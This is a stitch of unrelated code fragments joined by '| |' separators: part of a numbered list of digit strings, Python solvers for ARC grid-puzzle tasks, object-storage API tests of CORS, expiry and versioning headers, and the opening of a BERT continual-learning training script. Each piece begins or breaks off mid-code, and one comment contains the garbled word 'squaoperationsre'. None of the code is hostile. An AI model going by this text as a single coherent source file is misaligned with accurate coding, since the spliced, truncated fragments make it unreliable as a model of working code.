50568: "4363 4451 4531",
50569: "4363 4451 4532",
50570: "4363 4451 4533",
50571: "4363 4451 4534",
50572: "4363 4451 4535",
50573: "4363 4451 4536",
50574: "4363 4451 4537",
50575: "4363 4451 4538",
50576: "4363 4451 4539",
50577: "4363 4451 4540",
50578: "4363 4451 4541",
50579: "4363 4451 4542",
50580: "4363 4451 4543",
50581: "4363 4451 4544",
50582: "4363 4451 4545",
50583: "4363 4451 4546",
50584: "4363 4452",
50585: "4363 4452 4520",
50586: "4363 4452 4521",
50587: "4363 4452 4522",
50588: "4363 4452 4523",
50589: "4363 4452 4524",
50590: "4363 4452 4525",
50591: "4363 4452 4526",
50592: "4363 4452 4527",
50593: "4363 4452 4528",
50594: "4363 4452 4529",
50595: "4363 4452 4530",
50596: "4363 4452 4531",
50597: "4363 4452 4532",
50598: "4363 4452 4533",
50599: "4363 4452 4534",
50600: "4363 4452 4535",
50601: "4363 4452 4536",
50602: "4363 4452 4537",
50603: "4363 4452 4538",
50604: "4363 4452 4539",
50605: "4363 4452 4540",
50606: "4363 4452 4541",
50607: "4363 4452 4542",
50608: "4363 4452 4543",
50609: "4363 4452 4544",
50610: "4363 4452 4545",
50611: "4363 4452 4546",
50612: "4363 4453",
50613: "4363 4453 4520",
50614: "4363 4453 4521",
50615: "4363 4453 4522",
50616: "4363 4453 4523",
50617: "4363 4453 4524",
50618: "4363 4453 4525",
50619: "4363 4453 4526",
50620: "4363 4453 4527",
50621: "4363 4453 4528",
50622: "4363 4453 4529",
50623: "4363 4453 4530",
50624: "4363 4453 4531",
50625: "4363 4453 4532",
50626: "4363 4453 4533",
50627: "4363 4453 4534",
50628: "4363 4453 4535",
50629: "4363 4453 4536",
50630: "4363 4453 4537",
50631: "4363 4453 4538",
50632: "4363 4453 4539",
50633: "4363 4453 4540",
50634: "4363 4453 4541",
50635: "4363 4453 4542",
50636: "4363 4453 4543",
50637: "4363 4453 4544",
50638: "4363 4453 4545",
50639: "4363 4453 4546",
50640: "4363 4454",
50641: "4363 4454 4520",
50642: "4363 4454 4521",
50643: "4363 4454 4522",
50644: "4363 4454 4523",
50645: "4363 4454 4524",
50646: "4363 4454 4525",
50647: "4363 4454 4526",
50648: "4363 4454 4527",
50649: "4363 4454 4528",
50650: "4363 4454 4529",
50651: "4363 4454 4530",
50652: "4363 4454 4531",
50653: "4363 4454 4532",
50654: "4363 4454 4533",
50655: "4363 4454 4534",
50656: "4363 4454 4535",
50657: "4363 4454 4536",
50658: "4363 4454 4537",
50659: "4363 4454 4538",
50660: "4363 4454 4539",
50661: "4363 4454 4540",
50662: "4363 4454 4541",
50663: "4363 4454 4542",
50664: "4363 4454 4543",
50665: "4363 4454 4544",
50666: "4363 4454 4545",
50667: "4363 4454 4546",
50668: "4363 4455",
50669: "4363 4455 4520",
50670: "4363 4455 4521",
50671: "4363 4455 4522",
50672: "4363 4455 4523",
50673: "4363 4455 4524",
50674: "4363 4455 4525",
50675: "4363 4455 4526",
50676: "4363 4455 4527",
50677: "4363 4455 4528",
50678: "4363 4455 4529",
50679: "4363 4455 4530",
50680: "4363 4455 4531",
50681: "4363 4455 4532",
50682: "4363 4455 4533",
50683: "4363 4455 4534",
50684: "4363 4455 4535",
50685: "4363 4455 4536",
50686: "4363 4455 4537",
50687: "4363 4455 4538",
50688: "4363 4455 4539",
50689: "4363 4455 4540",
50690: "4363 4455 4541",
50691: "4363 4455 4542",
50692: "4363 4455 4543",
50693: "4363 4455 4544",
50694: "4363 4455 4545",
50695: "4363 4455 4546",
50696: "4363 4456",
50697: "4363 4456 4520",
50698: "4363 4456 4521",
50699: "4363 4456 4522",
50700: "4363 4456 4523",
50701: "4363 4456 4524",
50702: "4363 4456 4525",
50703: "4363 4456 4526",
50704: "4363 4456 4527",
50705: "4363 4456 4528",
50706: "4363 4456 4529",
50707: "4363 4456 4530",
50708: "4363 4456 4531",
50709: "4363 4456 4532",
50710: "4363 4456 4533",
50711: "4363 4456 4534",
50712: "4363 4456 4535",
50713: "4363 4456 4536",
50714: "4363 4456 4537",
50715: "4363 4456 4538",
50716: "4363 4456 4539",
50717: "4363 4456 4540",
50718: "4363 4456 4541",
50719: "4363 4456 4542",
50720: "4363 4456 4543",
50721: "4363 4456 4544",
50722: "4363 4456 4545",
50723: "4363 4456 4546",
50724: "4363 4457",
50725: "4363 4457 4520",
50726: "4363 4457 4521",
50727: "4363 | |
diagonals of the matrices. There can be multiple
such patterns in the grid. For each such pattern identified,
we have to add two blue squares of same size to their neighbourhood.
Positions of these blue squares will depend on the following :
1. Positions of the green squares
2. Whether green squares are connected via principal or secondary
diagonal
The positions for blue squares can be determined once we identify
the above two. Finally, these two squares are marked as blue.
How this function works:
We Start by going through each element in the array, row-wise.
Once an element with green colour is found, its checked to see
if the larger square containing the pattern is already visited.
If not, size of smaller squares in the figure/pattern is found
by starting from current element and moving right till another
non-green element is found. The number of moves taken is then
used to calculate the following :
- Size and position of small two squares in pattern
- Size and position of large square containing the pattern
- Size and position of the blocks to be changed to blue colour
These also depend on whether we find a green diagonal in large
square as principal one or secondary one. Finally, we modify the
required blocks to blue colour.
Correctness:
All the given cases are solved.
Arguments:
x : Input Numpy array of dimension 2 and equal shape
values for both axes
Returns:
A copy of x with required transformations applied
"""
x = x.copy() # Create copy of input array
rows, cols = x.shape # Get row and column count
green = 3 # Value for green
blue = 8 # Value for blue
found = [] # For figures already visited
# Loop through each block on the grid
# We will always find the first block of top
# part for the figure first. The algorithm makes
# use of this to find the pattern and solve the task.
for i in range(rows):
for j in range(cols):
if x[i][j] == green:
# Check if this figure/square was already visited
done = any([all([i >= f[0], i <= f[1], j >= f[2], j <= f[3]]) for f in found])
if done:
continue # Go to next block as this square was already visited
# Get size of smaller squares in the figure
# For this we start from current cell and we move right till
# we find a cell that's not green
# This will give count as n-1 for smaller square of size n
# So if size of smaller square is 2, we get 1 as c
c = 0 # Initialise count as 0
while (j + c + 1) < cols and x[i][j + c + 1] == green:
c += 1
# Set starting column and ending column values for smaller square
start_pos = j
end_pos = j + c
# Now there are two ways the pattern can come
# Either the squares are connected via principal diagonal or
# secondary diagonal
# Check if its connected via secondary diagonal
# For this, lets set the positions of larger
# square (parent matrix) which contains the two small squares
s_i = i # Starting row for the square
e_i = i + 2 * (c + 1) # Ending row for the square
s_j = j - c - 1 # Starting column + 1 for the square
e_j = end_pos + 1 # Ending column + 1 for the square
parent_matrix = x[s_i:e_i, s_j:e_j] # Get parent matrix
parent_matrix_diag = np.fliplr(parent_matrix).diagonal() # Get secondary diagonal
if np.all(parent_matrix_diag == green): # Check if all blocks in diagonal are green
found.append([s_i, e_i - 1, s_j, e_j - 1]) # Mark the visit to this parent square
# Lets set the square on top left first to blue
# Get index positions for the square
top_left_s_i = s_i - (1 + c)
top_left_e_i = s_i - 1
top_left_s_j = s_j - (c + 1)
top_left_e_j = s_j - 1
# Modify the index values so that they are within bounds
top_left_s_i, top_left_e_i, top_left_s_j, top_left_e_j = set_to_bounds(
top_left_s_i, top_left_e_i, top_left_s_j, top_left_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[top_left_s_i:top_left_e_i + 1, top_left_s_j:top_left_e_j + 1] = blue
# Now, set the squaoperationsre on bottom right to blue
# Get index positions for the square
bottom_right_s_i = e_i
bottom_right_e_i = e_i + c
bottom_right_s_j = e_j
bottom_right_e_j = e_j + c
# Modify the index values so that they are within bounds
bottom_right_s_i, bottom_right_e_i, bottom_right_s_j, bottom_right_e_j = set_to_bounds(
bottom_right_s_i, bottom_right_e_i, bottom_right_s_j, bottom_right_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[bottom_right_s_i:bottom_right_e_i + 1, bottom_right_s_j:bottom_right_e_j + 1] = blue
continue # Go to next block
# Check if they are connected via principal diagonal
# Get index positions for parent matrix
# s_i and e_i remains the same as before
s_j = start_pos # Starting column + 1 for the square
e_j = j + 2 * (c + 1) # Ending column + 1 for the square
parent_matrix = x[s_i:e_i, s_j:e_j] # Get parent matrix
parent_matrix_diag = parent_matrix.diagonal() # Get principal diagonal
if np.all(parent_matrix_diag == 3): # Check if all blocks in diagonal are green
found.append([s_i, e_i - 1, s_j, e_j - 1]) # Mark the visit to this parent square
# Lets set the square on top right first to blue
# Get index positions for the square
top_right_s_i = s_i - (c + 1)
top_right_e_i = s_i - 1
top_right_s_j = e_j
top_right_e_j = e_j + c
# Modify the index values so that they are within bounds
top_right_s_i, top_right_e_i, top_right_s_j, top_right_e_j = set_to_bounds(
top_right_s_i, top_right_e_i, top_right_s_j, top_right_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[top_right_s_i:top_right_e_i + 1, top_right_s_j:top_right_e_j + 1] = blue
# Now, set the square on bottom left to blue
# Get index positions for the square
bottom_left_s_i = e_i
bottom_left_e_i = e_i + c
bottom_left_s_j = s_j - (c + 1)
bottom_left_e_j = s_j - 1
# Modify the index values so that they are within bounds
bottom_left_s_i, bottom_left_e_i, bottom_left_s_j, bottom_left_e_j = set_to_bounds(
bottom_left_s_i, bottom_left_e_i, bottom_left_s_j, bottom_left_e_j, low=0, high=rows-1)
# Mark the required blocks as blue
x[bottom_left_s_i:bottom_left_e_i + 1, bottom_left_s_j:bottom_left_e_j + 1] = blue
return x
def solve_dc0a314f(x):
"""
Solves task dc0a314f
Description:
Given an array, we must find what values should be put into a square with green colours(3). The whole array
seems to be symmetric and the values taken up by the green points should be replaced by the other elements
present in the array.
How this function works:
This task entails filling in the values for the missing pieces (green colours). We found that for finding the
solution,the array should be created as a symmetric one and then the missing pieces should be gleaned from that.
To create such a symmetric array, we divide the array into four halves and chose the lower most left part
of the array. After this,we flipped this part vertically to obtain the lower right half and joined the two halves
together (left and right). When we flip this horizontally,we get the upper part of the array and from there
we can create the symmetric array.On comparison of this created array with the original array,we can easily find
the solution.
Correctness:
All the given cases are solved.
Arguments:
x : Input Numpy array of dimension 2 and equal shape
values for both axes
Returns:
A copy of x with required transformations applied
"""
dim1, dim2 = x.shape # get the dimensions(rows,columns respectively) from the array
half = int(dim1 / 2) # calculate the middle for the rows
x_ = x.copy() # make a copy of x
result = np.argwhere(x_ == 3) | |
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Expose-Headers': 'X-Foo-Header'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Expose-Headers header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Expose-Headers',
response.headers,
msg="Access-Control-Expose-Headers header was set")
expected = 'X-Foo-Header'
received = response.headers.get('Access-Control-Expose-Headers')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Expose-Headers header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_creation_with_access_controle_max_age(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Max-Age': '5'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Max-Age header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Max-Age',
response.headers,
msg="Access-Control-Max-Age header was set")
expected = '5'
received = response.headers.get('Access-Control-Max-Age')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Max-Age header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_creation_with_access_control_request_headers(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Request-Headers': 'x-requested-with'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Request-Headers header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Request-Headers',
response.headers,
msg="Access-Control-Request-Headers header was set")
expected = 'x-requested-with'
received = response.headers.get('Access-Control-Request-Headers')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Request-Headers header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_creation_with_access_control_request_method(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Request-Method': 'GET'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Request-Method header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Request-Method',
response.headers,
msg="Access-Control-Request-Method header was set")
expected = 'GET'
received = response.headers.get('Access-Control-Request-Method')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Request-Method header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_retrieval_with_origin(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
headers = {'access-control-allow-origin': 'http://example.com',
'access-control-expose-headers': 'X-Trans-Id'}
generate_object(container_name, object_name, headers=headers)
headers = {'Origin': 'http://example.com'}
response = self.client.get_object_metadata(
container_name, object_name, headers=headers)
self.assertIn(
'access-control-expose-headers',
response.headers,
msg="access-control-expose-headers header should be set")
self.assertIn(
'access-control-allow-origin',
response.headers,
msg="access-control-allow-origin header should be set")
expected = 'http://example.com'
received = response.headers.get('access-control-allow-origin')
self.assertEqual(
expected,
received,
msg='access-control-allow-origin header should reflect origin'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList(exclude=['dlo', 'slo']))
def ddtest_object_creation_with_file_compression(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
def object_data_op(data, extra_data):
data = zlib.compress(data)
return (data, extra_data)
object_headers = {'Content-Encoding': 'gzip'}
object_info = generate_object(container_name, object_name,
data_op=object_data_op,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Content-Encoding header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Content-Encoding',
response.headers,
msg="Content-Encoding header was set")
expected = 'gzip'
received = response.headers.get('Content-Encoding')
self.assertEqual(
expected,
received,
msg='object created with Content-Encoding header value'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_object_creation_with_content_disposition(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {
'Content-Disposition': 'attachment; filename=testdata.txt'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with content disposition header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Content-Disposition',
response.headers,
msg="Content-Disposition header was set")
expected = 'attachment; filename=testdata.txt'
received = response.headers.get('Content-Disposition')
self.assertEqual(
expected,
received,
msg='object created with Content-Disposition header value'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_object_creation_with_x_delete_at(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
start_time = calendar.timegm(time.gmtime())
future_time = str(int(start_time + 60))
object_headers = {'X-Delete-At': future_time}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with X-Delete-At header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Delete-At',
response.headers,
msg="X-Delete-At header was set")
expected = future_time
received = response.headers.get('X-Delete-At')
self.assertEqual(
expected,
received,
msg='object created with X-Delete-At header value'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_object_creation_with_delete_after(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'X-Delete-After': '60'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with X-Delete-After header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Delete-At',
response.headers,
msg="X-Delete-At header was set")
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object_versioning')
def ddtest_versioned_container_creation_with_valid_data(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_history_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
headers = {'X-Versions-Location': object_history_container_name}
self.client.set_container_metadata(container_name, headers=headers)
# list objects in non-current container
response = self.client.list_objects(
object_history_container_name)
method = 'list on empty versioned container'
expected = 204
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
# Create an object (version 1)
object_name = self.default_obj_name
ver1_info = generate_object(container_name, object_name)
response = ver1_info.get('response')
method = 'object version one creation'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
# Update an object (version 2)
object_name = self.default_obj_name
ver2_info = generate_object(container_name, object_name)
response = ver2_info.get('response')
method = 'update version one object'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.list_objects(object_history_container_name)
method = 'list on versioned container'
expected = 200
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@unittest.skip('Problem with this tests assertion, needs review')
@data_driven_test(ObjectDatasetList())
def ddtest_put_copy_object(self, object_type, generate_object):
src_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
dest_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
src_object_name = '{0}_source'.format(self.default_obj_name)
generate_object(src_container_name, src_object_name)
dest_obj_name = '{0}_destination'.format(self.default_obj_name)
source = '/{0}/{1}'.format(src_container_name, src_object_name)
hdrs = {'X-Copy-From': source, 'Content-Length': '0'}
response = self.client.copy_object(
dest_container_name,
dest_obj_name,
headers=hdrs)
method = 'put copy object'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object(
dest_container_name,
dest_obj_name)
method = 'copied object retrieval'
expected = 200
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@data_driven_test(ObjectDatasetList())
def ddtest_copy_object(self, object_type, generate_object):
src_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
dest_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
src_object_name = '{0}_source'.format(self.default_obj_name)
generate_object(src_container_name, src_object_name)
dest_object_name = '{0}_destination'.format(self.default_obj_name)
dest = '/{0}/{1}'.format(dest_container_name, dest_object_name)
headers = {'Destination': dest}
response = self.client.copy_object(
src_container_name,
src_object_name,
headers=headers)
method = 'copy object'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object(
dest_container_name,
dest_object_name)
method = 'copied object retrieval'
expected = 200
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@data_driven_test(ObjectDatasetList())
def ddtest_object_deletion_with_valid_object(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
generate_object(container_name, object_name)
response = self.client.delete_object(
container_name,
object_name)
method = 'delete object'
expected = 204
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object(
container_name,
self.default_obj_name)
method = 'object retrieval'
expected = 404
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@data_driven_test(ObjectDatasetList())
def ddtest_obj_metadata_update_with_object_possessing_metadata(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
generate_object(container_name, object_name,
headers={'X-Object-Meta-Grok': 'Drok'})
response = self.client.get_object_metadata(
container_name, object_name)
self.assertIn(
'X-Object-Meta-Grok',
response.headers,
msg="object not created with X-Object-Meta-Grok header")
expected = 'Drok'
received = response.headers.get('X-Object-Meta-Grok')
self.assertEqual(
expected,
received,
msg='object created with X-Object-Meta-Grok header value'
' expected: {0} received: {1}'.format(expected, received))
headers = {'X-Object-Meta-Foo': 'Bar'}
response = self.client.set_object_metadata(
container_name,
self.default_obj_name,
headers=headers)
method = 'set object metadata'
expected = 202
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Object-Meta-Foo',
response.headers,
msg="object updated with X-Object-Meta-Foo header")
expected = 'Bar'
received = response.headers.get('X-Object-Meta-Foo')
self.assertEqual(
expected,
received,
msg='object X-Object-Meta-Foo header value expected: {0}'
' received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_obj_metadata_update(self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
generate_object(container_name, object_name)
headers = {'X-Object-Meta-Grok': 'Drok'}
response = self.client.set_object_metadata(
container_name, object_name, headers=headers)
method = 'set object metadata X-Object-Meta-Grok: Drok'
expected = 202
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Object-Meta-Grok',
response.headers,
msg="object updated with X-Object-Meta-Grok header")
expected = 'Drok'
received = response.headers.get('X-Object-Meta-Grok')
self.assertEqual(
expected,
received,
msg='object X-Object-Meta-Grok header value expected: {0}'
' received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_content_type_not_detected_without_detect_content_type_header(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object1_name = 'object1.txt'
object1_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
generate_object(container_name, object1_name, headers=object1_headers)
object2_name = 'object2.txt'
object2_headers = {'X-Detect-Content-Type': False,
'Content-Type': 'application/x-www-form-urlencoded'}
generate_object(container_name, object2_name, | |
import os
import argparse
from copy import deepcopy
DATA_DIR = '../data'
parser = argparse.ArgumentParser()
parser.add_argument("--seed", type=int, default=0)
parser.add_argument("--epochs", nargs='+', type=int, default=[10, 10, 10, 10, 10],
help='Epoch number for each task')
parser.add_argument("--batch_size", type=int, default=8,
help='training batch size')
parser.add_argument("--bert_learning_rate", type=float, default=3e-5,
help='learning rate for pretrained Bert')
parser.add_argument("--learning_rate", type=float, default=3e-5,
help='learning rate for Class Classifier/General Space Encoder/Specific Space Encoder')
parser.add_argument("--task_learning_rate", type=float, default=5e-4,
help='learning rate for Task ID Classifier')
parser.add_argument("--replay_freq", type=int, default=10,
help='frequency of replaying, i.e. replay one batch from memory'
' every replay_freq batches')
parser.add_argument('--kmeans', type=bool, default=False,
help='whether applying Kmeans when choosing examples to store')
parser.add_argument("--dump", type=bool, default=False,
help='dump the model or not')
parser.add_argument('--gpu', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--n-labeled', type=int, default=2000,
help='Number of training data for each class')
parser.add_argument('--n-val', type=int, default=2000,
help='Number of validation data for each class')
parser.add_argument("--nspcoe", type=float, default=1.0,
help='Coefficient for Next Sentence Prediction Loss')
parser.add_argument("--tskcoe", type=float, default=1.0,
help='Coefficient for task ID Prediction Loss')
parser.add_argument("--disen", type=bool, default=False,
help='Apply Information Disentanglement or not')
parser.add_argument("--hidden_size", type=int, default=128,
help='size of General/Specific Space')
parser.add_argument("--model_path", type=str, default="./dump",
help='where to dump the model')
parser.add_argument("--reg", type=bool, default=False,
help='Apply Regularization or Not')
parser.add_argument("--regcoe", type=float, default=0.5,
help='Regularization Coefficient when not replaying')
parser.add_argument("--regcoe_rply", type=float, default=5.0,
help='Regularization Coefficient when replaying')
parser.add_argument("--reggen", type=float, default=0.5,
help='Regularization Coefficient on General Space')
parser.add_argument("--regspe", type=float, default=0.5,
help='Regularization Coefficient on Specific Space')
parser.add_argument("--store_ratio", type=float, default=0.01,
help='how many samples to store for replaying')
parser.add_argument('--tasks', nargs='+', type=str,
default=['ag', 'yelp', 'amazon', 'yahoo', 'dbpedia'], help='Task Sequence')
parser.add_argument('--select_best', nargs='+', type=bool,
default=[True, True, True, True, True],
help='whether picking the model with best val acc on each task')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
import numpy as np
import torch
from tqdm import tqdm
from transformers import AdamW, get_constant_schedule_with_warmup
from sklearn.cluster import KMeans, MiniBatchKMeans
from model import Model, Predictor
from read_data import compute_class_offsets, prepare_dataloaders
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
args.device = device
n_gpu = torch.cuda.device_count()
dataset_classes = {
'amazon' : 5,
'yelp' : 5,
'yahoo' : 10,
'ag' : 4,
'dbpedia' : 14,
}
class Memory(object):
def __init__(self):
self.examples = []
self.masks = []
self.labels = []
self.tasks = []
self.features = []
def append(self, example, mask, label, task):
self.examples.append(example)
self.masks.append(mask)
self.labels.append(label)
self.tasks.append(task)
def store_features(self, model):
"""
Args:
model: The model trained just after previous task
Returns: None
store previous features before trained on new class
"""
self.features = []
length = len(self.labels)
model.eval()
with torch.no_grad():
for i in range(length):
x = torch.tensor(self.examples[i]).view(1, -1).to(device)
mask = torch.tensor(self.masks[i]).view(1, -1).to(device)
g_fea, s_fea, _, _, _ = model(x, mask)
fea = torch.cat([g_fea, s_fea], dim=1).view(-1).data.cpu().numpy()
self.features.append(fea)
print(len(self.features))
print(len(self.labels))
def get_random_batch(self, batch_size, task_id=None):
if task_id is None:
permutations = np.random.permutation(len(self.labels))
index = permutations[:batch_size]
mini_examples = [self.examples[i] for i in index]
mini_masks = [self.masks[i] for i in index]
mini_labels = [self.labels[i] for i in index]
mini_tasks = [self.tasks[i] for i in index]
mini_features = [self.features[i] for i in index]
else:
index = [i for i in range(len(self.labels)) if self.tasks[i] == task_id]
np.random.shuffle(index)
index = index[:batch_size]
mini_examples = [self.examples[i] for i in index]
mini_masks = [self.masks[i] for i in index]
mini_labels = [self.labels[i] for i in index]
mini_tasks = [self.tasks[i] for i in index]
mini_features = [self.features[i] for i in index]
return torch.tensor(mini_examples), torch.tensor(mini_masks), torch.tensor(mini_labels), \
torch.tensor(mini_tasks), torch.tensor(mini_features)
def get_minibatch(self, batch_size):
length = len(self.labels)
permutations = np.random.permutation(length)
for s in range(0, length, batch_size):
if s + batch_size >= length:
break
index = permutations[s:s + batch_size]
mini_examples = [self.examples[i] for i in index]
mini_masks = [self.masks[i] for i in index]
mini_labels = [self.labels[i] for i in index]
mini_tasks = [self.tasks[i] for i in index]
mini_features = [self.features[i] for i in index]
yield torch.tensor(mini_examples), torch.tensor(mini_masks), torch.tensor(mini_labels), \
torch.tensor(mini_tasks), torch.tensor(mini_features)
def __len__(self):
return len(self.labels)
def random_seq(src):
#adding [SEP] to unify the format of samples for NSP
batch_size = src.size(0)
length = src.size(1)
dst = []
for i in range(batch_size):
cur = src[i]
first_pad = (cur.tolist() + [0]).index(0)
cur = cur[1:first_pad].tolist()
cur = random_string(cur)
padding = [0] * (length - len(cur) - 1)
dst.append(torch.tensor([101] + cur + padding))
return torch.stack(dst).to(device)
def random_string(str):
#randomly split positive samples into two halves and add [SEP] between them
str.remove(102)
str.remove(102)
len1 = len(str)
if len1 == 1:
cut = 1
else:
cut = np.random.randint(1, len1)
str = str[:cut] + [102] + str[cut:] + [102]
return str
def change_string(str):
#creating negative samples for NSP by randomly splitting positive samples
#and swapping two halves
str.remove(102)
